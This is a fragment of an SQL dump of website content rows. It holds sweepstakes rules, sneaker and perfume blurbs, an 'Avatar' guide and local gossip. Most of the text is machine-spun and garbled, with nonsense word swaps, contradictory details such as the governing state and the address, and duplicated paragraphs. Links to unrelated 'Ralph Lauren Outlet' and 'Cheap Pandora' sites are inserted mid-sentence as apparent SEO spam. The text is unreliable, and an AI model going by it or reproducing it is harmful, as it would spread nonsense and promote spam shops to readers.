SponSor, whoSe activitieS Shall be binding and final in all reSpectS.In the body of your email add your name, program, confront, number and email addreSS.Properly, enter by making the form, completing aS told, in addition to your name, boSS, offer, cell phone number and email addreSS and mail to: \"Guide to development\"ConteSt, c/o men\'S your well-Being, 733 third ave, 10th hardwood baSe, big apple, nyc 10017.You muSt follow all pointS to enter thiS SweepStakeS.Et, july 2nd, 2007, and all mail in entrieS appearS to be poStmarked no later than july 2, 2007.Max one(1)Entry per particular, per e mail detailS, per day on the promotion period.EntrieS by the Same perSon over the limitS Stated herein will be diSqualified.PluS, entry material/entry cannot contain the image or likeneSS of or reference in any recognizable way(AS an example, by full name, or by any part of a name that iS familiar)Any perSon except the entrant, eSpecially, but not tied to, any depictionS of famouS people, unleSS a Signed give off from Such perSon(S)IS Submitted to SponSor and alSo the entry material/entry.3.Random attracting;OddS of taking:SponSor will randomly pick the winner(S)From among all eligible entries collected on july 12, 2007.Odds of winning depend on the amount of eligible entries received.<br /><br />Winner notice:ProSpect winner will be notiFied bY e mail, uSing tHe Feedback provided on HiS/Her entrY, on or tHat iS related to julY 19tH, 2007.THe winner muSt replY witH all inFo requeSted in tHe notiFication witHin Five(5)DaYS From tHe date tHe notice e mail waS Sent, or anotHer winner maY be decided on.Once tHe poSSible winner HaS replied, SponSor will Send to potential winner bY e mail, at tHe e mail reSidence location on HiS/Her entrY, an AFFidavit oF qualiFicationS, relieve liabilitY, SpotligHt releaSe, unleSS banned bY law, and anY otHer certiFication tHat SponSor requireS(A perSon\'S\"AFFidavit\").AS well aS to redeem HiS/Her prize, capabilitY winner(S)Will Sign, are bleSSed witH notarized, and get back to SponSor tHe aFFidavit witHin Fourteen(14)DaYS tHe actual date SponSor Sent tHe aFFidavit.AnY client(HiS/Her parent/legal guardian iF a reSident oF a legiSlation tHat deemS Him/Her to be a minor)Would Sign, Have notarized and get back on SponSor a liabilitY releaSe, Subjection releaSe, unleSS reStricted bY law, and anY otHer FormS tHat SponSor requireS witHin Fourteen(14)DaYS aFter receipt bY HazardS winner(S).SHould: (A new)ProSpectS winner(S)Cannot be reacHed For reasons unknown aFter a reasonable eFFort Has been exerted based on tHe inFormation stated in tHe entrY,(H)OF noncompliance with the above or within anY oF the aForesaid cYcles,(F)Potential winner is found to be ineligible to enter the contests or receive the prize,(Debbie)Potential winner cannot or does not complY with the state rules,(At thelizabeth)Potential winner prize notification or affidavit is returned as undeliverable for reasons unknown, or perhaps a(Y)Potential winner fails to fulfill the affidavit related repayments, the winner shall be disqualified from the sweepstakes and an alternate potential winner may be selected, at sponsor\'s sole prudence, from among additional eligible entries received.Winner selection is under the managing of sponsor, whose preferences are final and binding in all respects.If entrant\'s e mail url, cell phone number, or home mailing address changes after he/she enters the contests, it is the entrant\'s sole dependability to notify sponsor by postal mailing notice to the address stated below to be received before the end of the promotion period.Awards:The rough retail value(Their\"Arv\")Of the prize is $1000 and comprises of two(2)$500 American Express gift cards we have a total of one(1)Prize to be given to one(1)Victorious. American ExpreSS GiFt CardSSHould be conSidered anYwHere tHeY are accepted.Rodale shall have no responsibilities for the replacement of any lost or stolen american express gift cards once the gift cards have been provided to the winner, nor is it responsible for any resulting fees linked to the american express gift cards and their use.Prize is subject to any and all terms that may apply to the american express gift cards.American express is a registered trademark of yankee express company.American express company is not a sponsor of the contest, and endorse this sweepstakes promotion and is not affiliated, any way, with the special promoting and advertising.All other expenses not specifically listed herein are solely the winner\'s accountability including, but not limited by, sales place a burden on, and all inadvertent expenses.Prize subject to any and all applicable terms.Any depictions of prizes are for illustrative usages only.All country wide, state and local taxes on the prize are the sole duty of the winner.Winner will be sent an irs federal 1099 misc tax form for the retail valuation on any prize at or above $600.No download, tax refund, alternative, or replacing of prizes permitted, with the exception that sponsor reserves the right, in its sole foresight, to replace a prize of equal or greater value(Or cash counterpart).Euro.All prizes will be awarded within 1 year of receipt of valid and executed winners affidavit or prize evidence.Any portion of the prize not accepted or unclaimed and/or unused by the winner will be forfeited and won\'t be substituted.<br /><br />6.MarKetinG releaSe;USe of inforMation:Except where prohibiteD or confineD by law, winner acceptance of prize coMpriSeS the winner aGreeMent anD conSent for SponSor to uSe anD/or publiSh winner full naMe, State of reSiDence, entry anD entry cheMicalS, photoS or other liKeneSSeS, photoGraphS, pictureS, expreSS, reportS, bioGraphical factS(Entirely or in part), AnD/or StateMentS MaDe by winner about the SweepStaKeS or SponSor, WorlDWiDe anD in perpetuity for every purpoSeS, Contain, But not liMiteD by, AD, TraDe anD/or proMotion on the part of SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter MaDe, IncorporatinG, But not reStricteD to, IMpreSS, TeleviSion for coMputer, R / c, Cable connection, Electronic or worlD-WiDe-Web, without further StopS, ban, reparation, uncover, teStiMony, or criteria.SiMply by enterinG, entrantS aGree anD conSent to allow SponSor to uSe anD/or publiSh hiS/her perSon\'S naMe, State of reSiDence, entry anD entrieS aSSetS, iMaGeS or other liKeneSSeS, StD, pictureS, SpeaK, cuStoMer reviewS, anD bioGraphical Data(Entirely or in part), WorlDwiDe anD in perpetuity for any purpoSeS, Such aS, But not on a, CaMpaiGnS, TraDe anD/or proMotion for SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter createD, To incluDe, But not reStricteD to, Pattern, Tv Set, AirwaveS, Cable, Electronic or the net, Without further iSSue, Ban, Pay planS, TaKe note of, MeaSure, Or approval to the extent MaDe way for by law.AlSo by enterinG the conteSt, entrantS will be SharinG their info with SponSor.InforMation collecteD by SponSor will be uSeD for aDMiniStration of the SweepStaKeS anD awarDinG the prize.PleaSe refer to SponSor privacy policy for you you inforMation reGarDinG the collection, uSe anD DiScloSure of inforMation by SponSor.SponSor iS not reGarDinG DiScloSureS MaDe by any thirD party.SponSor uSeS reaSonable coMMercial effortS to coMply with feDeral can law anD entrantS May SubSequently opt out of receivinG further eMailS by followinG opt out inStructionS containeD in SponSor policy.All entrieS becoMe the houSe of SponSor upon receipt anD will not be acKnowleDGeD or returneD.ReGulationS, liMitationS, anD/or court perforMS.EntrantS inforMation will not be proviDeD to any thirD partieS, other than aS proviDeD for in the official ruleS or prior to SpoSnor privacy policy. )Merely taMperinG;In orDer to cancel, tranSforM:SponSor anD itS parent proDucerS, SubSiDiarieS, aSSociateS, allieS, SpecialiStS, broKerS, SucceSSorS, aSSiGnS, SaleS aGentS, officerS anD DirectorS Shall not have any obliGation or reSponSibilitieS, incluDinG any liability to awarD any prize to entrantS, with reSpect to: (One)EntrieS/entry MaterialS that contain any MiStaKeS or Do not coMply with or violate the official ruleS; (Y SiMply)EntrieS/entry referenceS, prize claiMS or announceMentS that are loSt, later part of the, not whole, illeGible, unintelliGible, DaMaGeD or perhapS not receiveD by the intenDeD recipient, entirely or in part, Due to private, huMan or technical error reGarDleSS of the Sort; (G)EntrantS who have coMMitteD frauD or Deception in entering or engaging in the SweepStaKeS or claiMing the prize; (M)Phonephone, electronic Digital, coMputer electronicS, a Software prograM, Do networKing, internet or coMputer DoeS not worK properly, failureS or DileMMaS; (Agouritorito)Any inability of the winner to accept the prize unconDitionally; (M)If a prize cannot be awarDeD Due to travel termination, DelayS or DiSruptionS Due to actS of goD, earthquaKeS, terroriSm, weather or other Similar event beyonD SponSor reaSonable control;AnD alSo(You have he)Any DeStruction, injurieS or loSSeS of any KinD cauSeD by any prize or cauSeD by awarDing, acKnowleDgement, thing, help, incorrect uSe, loSS or miSDirection of any prize or reSulting from utilizing thiS promotion or any promotion or prize relateD activitieS.SponSor reServeS an appropriate, in itS Sole acumen, to DiSqualify Someone it finDS to be(An actual)Tampering with the entry proceSS or the operation of the conteSt, or with any web SiteS promoting the DrawingS; (D)Acting in violation of the State ruleS;In addition(K)Entering or attempting to enter the SweepStakeS multiple timeS uSing multiple e mail addreSSeS or the uSe of any robotic or automated deviceS to Submit entrieS.If SponSor findS, in itS Sole prudence, that technical rigorS or unforeSeen eventS compromiSe the integrity or viability of the SweepStakeS, SponSor reServeS the authority to void the entrieS at iSSue, and/or terminate the appropriate portion of the SweepStakeS promotion, Since entire SweepStakeS promotion, and/or modify the drawingS and/or Select winner(S)To award the reward(S)Using all eligible entries received as of the end of contract date.Discharge of liability;Please note of warranty;Forum alternative clause:By engaging in the sweepstakes, entrants and winner agree to liberate and hold harmless sponsor and its parent companies, subsidiaries, affiliate web sites, loved ones, reps, solutions, successors, assigns, persons, officers and company owners, from any liability, for lowering, injure, dings, shock, cost or expense the least bit including without limitation, home and real estate assets damage, compensation claims(Adding emotional distress), And/or death which may occur related to preparation for, Or guidance in, The contests, Or person, Acceptance and/or use or misuse of the prize or engagement in any Sweepstakes related activity and for any claims or causes of action based on publicity rights, Defamation or invasion of privacy and supplement delivery.By acknowledging the prize, winner agrees that any liability concerning or arising out of the prize rests solely with the software creator of the goods or their affiliates.Sponsor and its parent solutions, subsidiaries, web marketers, male dates, employees, broker employees, successors, assigns, workforce, officers and directors assume no task for any injury or damage to entrants or to any other person computer, regardless how caused, relating to or resulting from entering or downloading materials or software in association with this sweepstakes.Entrants and winners acknowledge that sponsor has neither made nor are in any manner answerable or liable for any warranty, representations or makes sure, express or intended, truly or in law, in accordance with any prize, integrating, but not on a, express warranties provided by the maker of the goods or their affiliates.Except where disallowed, all issues and questions concerning the development, abilities, presentation and enforceability of these official rules, or the rights and obligations of entrant or sponsor regarding the the sweepstakes, will likely to be governed by, and construed according to, the laws of the commonwealth of missouri without giving effect to any choice of law or conflict of law rules(Whether of the commonwealth of missouri, or other jurisdiction), Which would cause use of the laws of any jurisdiction other than the Commonwealth of Pennsylvania.As an affiliate, any dispute relating to the drawings(To include these official rules)Shall be brought in the best quality state or federal court having jurisdiction over the subject matter located in the county of lehigh, pa.Entrants hereby irrevocably consent to the non-Public jurisdiction of said courts and waive any claim of forum non conveniens or lack of personal jurisdiction they may have.9.Daily affixed, so that you can:2007 Guide to Style contest, Rodale corporation, 733 3rd Ave, 10th bottom, Nyc, Los angeles 10017 3204.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-26 02:30:53',736,736,'2015-05-26 02:30:53','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/5ADCB.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/5ADCB.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,7,'','',1,995,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(133,274,'commercial','adcb-2','<p>Nike acg withinside blogbabel <br /><br />Nike:Sb robert rodriguez 7, sized?Roshe run \'urban safari\' put e foamposite pro \'forest/black volt\'(Foto)<br /><br />Vi presentiamo 3 nuovi modelli targati nike.Alcuni <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.imespec.it\">Ralph Lauren Polo Italia</a></b> più interessanti di altri, sono fatte apposta each and every chi ama le nike incondizionatamente.<br /><br />Cominciamo con la nike frutto della collaborazione tra amount?Vitamin y nikat thelizabeth.Cuando tratta delle nuoviscuandome roshe rundella collezione rende omaggio alla divicuandoone acg, viene presentata in due contrasting colorazionidire la safari, le nuove footwear nike size?Saranno disponibili dal 14 giugno.<br /><br />Con una stampa camouflage clothing, la nike air foamposite seasoned executive \'forest/black <br /><br />12 giugno 2013 Sportydoo blogging sulle attrezzature sportive <br /><br />Stussy x nike \'s capsule catalogue <br /><br />Nike e stussy continuano a collaborare da 12 anni ed ora sono pronte a lanciare una nuova collezione adatta a tutti gli appassionati delete genere.<br /><br />Divisa in prosecute adatte anche alle strade di città.<br /><br />I materiali scelti concerning la realizzazione della collezione sono <b><a title=\"Ralph Lauren Outlet\" href=\"http://www.imespec.it\">Ralph Lauren Outlet</a></b> i migliori in possesso di nike, gna ha prodotto 3 modelli di calzature leggeri e performanti.<br /><br />Off bunch system, la nuova linea outdoor encouraged di nike, è una miscela di look e tecnologie che si avvicina al passato acg del completely.<br /><br />16 ottobre 2012 Sportydoo web log sulle attrezzature sportive <br /><br />Stussy x nike off mountain system \'s capsule chain <br /><br />A distanza di united nations anno dall\'ultima volta stussy e nike tornano a collaborare.Questa volta però il risultato non è il una collezione completa basata sulla nuova lineaoff hill system di nike.<br /><br />Off mountain / hill system è la nuova linea outdoor inspired del di ieri e di oggi che strizza l\'occhio al glorioso passato acg del brand.La collaborazione minus stussy è composta da tre.Se volete approfondire su gq c\'è un\'intervista a riguardo ai engineers nike e stussy.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-22 03:02:35',736,736,'2015-05-22 03:02:35','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/6commercial.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/6commercial.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,6,'','',1,654,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(134,275,'QNB','qnb','<h1 class=\"page-title\" style=\"margin: 0px 0px 10px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 20px; line-height: inherit; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; width: 444px; color: #116fc4; font-weight: normal !important;\">QNB Financial Services</h1>\r\n<div style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">QNB Financial Services (QNB FS) was established in the last quarter of 2010 as part of the QNB Group, offering a range of financial services to foreign institutional investors, mutual funds, domestic institutional investors, high net- worth individuals, retail and corporate clients.</div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">QNB FS launched its brokerage unit in May 2011 providing both individual and institutional clients access to stocks listed on the Qatar securities markets.</div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">It also provides access to stock trading on European and U.S. markets. Moreover, QNB FS offers world-class research and analysis enabling you to make sound investment decisions.</div>','',1,84,'2014-03-31 06:04:29',736,'','2016-04-03 05:46:47',736,0,'0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/7QNB.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/7QNB.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,5,'','',1,941,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(135,276,'GBCM','business-pages-6','<p>Five <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> things to know for you to see \'avatar\' <br /><br />\"The movie avatar\"Is the big budget film by director james cameron of and fame.What you need to understand before you see it.<br /><br />1.Rare skinned aliens, within the armed forces, romance and exotic settings are all area of the sci fi epic about a paraplegic ex marine who <b><a title=\"Cheap Pandora Bracelets\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Cheap Pandora Bracelets</a></b> starts a new life on the distant planet of pandora, find out himself battling humankind alongside the planet indigenous na race.<br /><br />2.It most current big budget film by director james cameron of and fame.Since the film cost approximately $300 million to make, you would see some pricey and spectacular special effects.The film has garnered flattering reviews from film critics.<br /><br />3.You understand the film in three different formats:In general 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, emphasize cinema de lux patriot place in foxboro and show off cinema de lux legacy place in dedham.<br /><br />4.If desire to see it in imax, you would go to either natick or reading, from the spot while the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday evening, most friday evening and weekend shows were soldout at the imax theater in natick.<br /><br />5.Many people, like boston film essenti ed symkus, formerly seen the film twice.And symkus says he plans to go a third time together along regarding his wife.Seen it in everyday 3d now twice.Ok last one.It wonderful, he explained.Director cameron has been working on the film for over a decade, symkus known.Promised a whole new ambiance to cinema with this film and he achieved it.He really scores of this movie, symkus known.Would recommend it in 3d.<br /><br />\"Character\"Is the big budget film by director james cameron of and fame.What you have to know before you see it.<br /><br />1.Light yellow skinned aliens, within the armed forces, romance and exotic settings are all perhaps the sci fi epic about a paraplegic ex marine who starts a new life on the distant planet of pandora, realize himself battling humankind alongside the planet indigenous na race.<br /><br />2.It most up-To-Date big budget film by director james cameron of and fame.Since the film cost around $300 million to make, you would see some pricey and spectacular special effects.The film has garnered convenient reviews from film critics.<br /><br />3.See the film in three different formats:In continuous 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, show cinema de lux patriot place in foxboro and accentuate cinema de lux legacy place in dedham.<br /><br />4.If your goal is to see it in imax, you should go to either natick or reading, how the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are made and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday morning, most friday evening and weekend shows were had sold out concerts at the imax theater in natick.<br /><br />5.A lot of, like boston film essenti ed symkus, previously seen the film twice.And symkus says he plans to go a third time along with wife.Seen it in every day 3d now twice.Ok last one.It proficient, he was quoted saying.Director cameron has been working on the film for over a decade, symkus shown.Promised a whole new overall look and feeling to cinema with this film and he achieved it.He really scores utilizing movie, symkus cited.Will recommend it in 3d.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-19 02:26:27',736,736,'2015-05-19 02:26:27','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/100GBCM.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/100GBCM.png\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,4,'','',1,1318,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(136,277,'ALSHOROOQ','business-pages-7','<p>10 Popular perfume <br /><br />Perfume is a wonderful accessory women love to wear.It\'s fantastic finish off a look or serves as a great pick me up.Here is a list of 10 popular perfumes loved by women in every location.<br /><br />1.Chanel it doesn\'t.5 <br /><br />Chanel absolutely.5 is a preferred and classic perfume.Here first ever perfume launched by coco chanel herself.It is the most famous perfume in the world according to many and makes millions per year.This not online perfume has aldehydes, lime, ylang ylang, rose bush, jasmine, lily of the area, sandalwood, vetiver and amber loans.Ernest beaux was the chemist who created this excellent perfume that has been worn by many celebrities including marilyn monroe.<br /><br />Daisy is <b><a title=\"polo homepage\" href=\"http://www.stevegriffin.co.uk\">polo homepage</a></b> a youthful and not too serious perfume that many ladies love.This light and fresh scent has notes of blood, violet leaving, dark red red grapefruit, gardenia, violet flower petals and leaves, jasmine flower petals and leaves, musk, vanilla flavouring and white woods.The bottle for this perfume matches the scent nicely featuring its flower top and feminine shape.<br /><br />6.Ralph lauren beauty <br /><br />This enchantment perfume is a love story in a bottle.Wear this scent and you get many compliments from women and men.This is also the perfect gift for men to get their spouse.This classic scent has notes of sungoddess rose, marigold, cinnamon, linden oil, teal freesia, bright violet, lotus wedding plants, day lily, patchouli, oakmoss, and consequently musk.This perfume has been a favorite to many women who wear it anywhere for any special occasion.<br /><br />7.Giorgio armani code fill femme <br /><br />This sexy perfume has amazing endurance.Many for women who live testified how this fresh and feminine scent lasts all day.Armani code pour femme has sees of blood orange, ginger herb, pear sorbet, sambac jasmine, orange floral, seringa bloom, rose honey, valuable woods complex, and vanilla flavouring.Attractive and confident when wearing this feminine scent.8.Jimmy choo <br /><br />Jimmy choo is a perfume that is representative of the modern woman.It has an strengthening, beautiful and irresisteble feel when worn.The scent is contains tiger orchard, pear nectar, sweet chinese orange, toffee, indonesian patchouli, and spicey chypre notes.The brand founder and chief creative officer tamara mellon created a bottle and box that represented her preferences.The bottle design was inspired by jewel colored venetian murano glass and suits the brand many crystal encrusted shoes.This confident and sexy scent is worn by a lot of women worldwide.<br /><br />9.L\'air du conditions by nina ricci <br /><br />This floral and spicy perfume was made in france in 1948.It is an iconic perfume from the nina ricci house acquiring passion and elegance.L du temps is nina ricci most famous perfume and the scent was created by the effort of <b><a title=\"Ralph Lauren Outlet UK\" href=\"http://www.stevegriffin.co.uk\">Ralph Lauren Outlet UK</a></b> robert ricci and perfumer francis fabron.The scent reflects the product or service values of peace, wholesomeness, autonomy and love.This scented has notes of peach, carnation, bergamot, rosewood, peppermint, gardenia, orchid, cloves, jasmine, orris origin, eye, designer, benzoin, forest, vetiver in addition, sasalwood.This fresh and timeless scent brings out sensual charm and refinement from the wearer.10.Jean robert gaultier classique <br /><br />This perfume was jean paul gaultier first parfum launched in 1993.It is a woman floral oriental scent that is sensual and progressed.Jean paul gaultier is not a boring designer and he was able to bring that hallmark of himself into this perfume.This scented has notes of rum essence, rose fact, vanilla flavor orchid, daffodil, bourbon vanilla flavouring, pleasant amber, sandalwood genuine, tonka bean and emerald.As for the structure of this perfume bottle, it mimics a girly figure.Year in year out this brand re dresses the torso, package deals it, and sells it again as limited updates.This perfume is both elegant and classic.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-15 02:52:00',736,736,'2015-05-15 02:52:00','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/101shorooq.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/101shorooq.png\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,3,'','',1,1086,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(137,278,'fsc','business-pages-8','<p>Ace archer needs her bow with ralph lauren <br /><br />Who says we\'re not clean?<br /><br />Joy fahrenkrog is the denver kid of well known kentwood city realtor judy fahrenkrog and ralph lauren\'s latest model.Feeling that puts her in very comely company.<br /><br />Joy is an ace archer and was chosen by lauren to star in some print ads, by using three other elite jocks, to model his olympic rasing and lowering ceremony uniforms.She missed the olympic games cut this past weekend, but she achieved lauren\'s.The ads will start appearing this month in many mags while the cover of the tony hamptons magazine.<br /><br />Cu boulder student leonard sun was just named peta\'s cutest all-Vegetable alive.From easily 1, 700 males nominees and 55, 000 ballots, sun is the greatest vegan in the meat market.<br /><br />In a introduce, sun defined,\"Meat is gross and poor, and it\'s fair to eat animals(Recently)On account that we can, <br /><br />Hot l denver colorado <br /><br />I have been on stage twice in denver.Once as a supernumerary in ie colorado\'s\"Stop working fledermaus, i think i flubbed the line announcing the appearance of someone.<br /><br />And i gamed a\"Diane\"At the barth hotel in john ashton\'s legendary 1991 output of\"The recent l baltimore, the toy, about a rundown hotel and its off the beaten track residents, was displayed in the lobby of the barth hotel, the lodo family home hall that\'s part of denver senior options.People wandered in and out of the lobby as the play went on it was great and i was one of the several denverites who had a one night walk on role.<br /><br />Before i was able to utter my line, actor pam clifton had me pushed with a doorway.<br /><br />But give up show commercial?Remember not to!I\'m down to do a walk on in the coming revival of\"Quite l, again heading towards barth hotel, july 18 associated with aug.23.<br /><br />Ashton can\'t produce the, but he\'ll do a stroll on.And same goes with ed sardella.And ann kiely.And a great other denver bold names.Stay tuned for more and stay at the hot l!<br /><br />Outline the clown <br /><br />Molly kleeman is perhaps also known as skiddles the clown.She\'s been slapping on the make <b><a title=\"Ralph Lauren UK:http://www.ycol.co.uk/\" href=\"http://www.ycol.co.uk\">Ralph Lauren UK:http://www.ycol.co.uk/</a></b> up and the red nose in denver since 1996 and she\'s recently back from the world clown connections convention in lake buena vista, fla.<br /><br />She\'s won clown, coming back home with three medals:A bronze in knowledgeable balloons, silver in paradeability and the gold in makeup and armoire.Blind and disrobed.<br /><br />That\'s how rioja is accounts receivable its may 19 wine event.The bottles to get naked, no trademarks, so the tasting will be blind as you pair up four courses with grapes from all over the world.<br /><br />In the 